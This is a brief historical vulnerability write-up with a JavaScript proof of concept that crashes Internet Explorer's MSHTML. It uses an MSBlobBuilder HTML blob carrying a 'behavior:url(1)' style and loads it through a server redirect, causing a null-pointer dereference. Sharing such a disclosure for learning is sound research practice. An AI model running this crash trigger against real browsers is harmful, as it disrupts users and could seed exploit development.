I found that creating a blob with HTML content that referenced an HTC behavior (style="behavior:url(1)") and then navigating to it via a server redirect caused a crash in MSHTML!CDwnBindInfo::GetBindString. Credits for the blob research direction go to Gareth Heyes and Mario Heiderich.

var bb = new MSBlobBuilder();
bb.append('<div style="behavior:url(1)">'); // This will crash the browser.
var blob = bb.getBlob("text/html");
var blobUrl = window.URL.createObjectURL(blob);
location.href = "redirect.aspx?URL=" + blobUrl; // Crash (because of the behavior above).

When the browser rendered the blob and tried to load the HTC behavior URL, CDwnBindInfo::GetBindString dereferenced a null pointer at offset 0x34. The fault was rated UNKNOWN exploitability with the note that data from the faulting address controls branch selection.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.